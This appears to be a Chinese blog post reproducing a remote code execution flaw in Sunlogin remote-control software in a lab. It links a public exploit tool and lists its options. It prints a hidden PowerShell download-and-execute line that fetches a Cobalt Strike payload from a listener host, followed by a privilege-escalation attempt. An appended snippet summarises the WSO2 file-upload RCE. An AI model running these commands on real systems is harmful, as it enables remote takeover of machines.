向日葵RCE(CNVD-2022-10270/CNVD-2022-03672)

目录

漏洞描述:

工具复现:

CS服务器上线:(失败)


漏洞描述:

上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。

影响版本:

向日葵个人版   for Windows <= 11.0.0.33
向日葵简约版   <= V1.0.1.43315(2021.12)

工具复现:

同一局域网:
攻击机:172.52.3.214
客户机PC:192.168.29.152

工具下载:向日葵漏洞工具https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

-h 指定目标
-t 选择扫描或者命令执行 默认scan
-p 设置扫描端口范围 默认4w到65535
-c 需要执行的命令

客户机PC: 

攻击机PC:

使用工具进行扫描:(向日葵端口在40000-60000之间,所以可以直接指定端口)

命令执行:

CS服务器上线:(失败)

CS服务器中选择攻击-Web钓鱼-Web投递——设置端口、监听器

Payload生成:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.29.130:444/a'))"

进入客户端cmd输入即可上线

测试时发现,通过向日葵漏洞无法通过远程cmd执行上线(可能权限不够)

进行提权:切换administrator用户:

runas /noprofile /user:Administrator cmd

还是不行,可能因为”符号被windows内部重复处理了

客户机直接cmd测试:

CS成功上线:

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
回答: CVE-2022-29464是WSO2文件上传漏洞的漏洞编号。该漏洞是一种未经身份验证的无限制任意文件上传漏洞,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得远程命令执行(RCE)的权限。\[3\]攻击者可以利用该漏洞上传恶意的JSP文件,并通过执行任意命令来控制服务器。这个漏洞的具体利用方式是通过在HTTP POST请求中上传恶意文件来实现的。\[2\]一旦攻击者成功利用该漏洞,他们可以执行任意命令,可能导致服务器被完全控制。因此,对于使用受影响版本的WSO2的用户来说,修复该漏洞是非常重要的。 #### 引用[.reference_title] - *1* *3* [【春秋云境】CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)](https://blog.csdn.net/FODKING/article/details/125746993)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值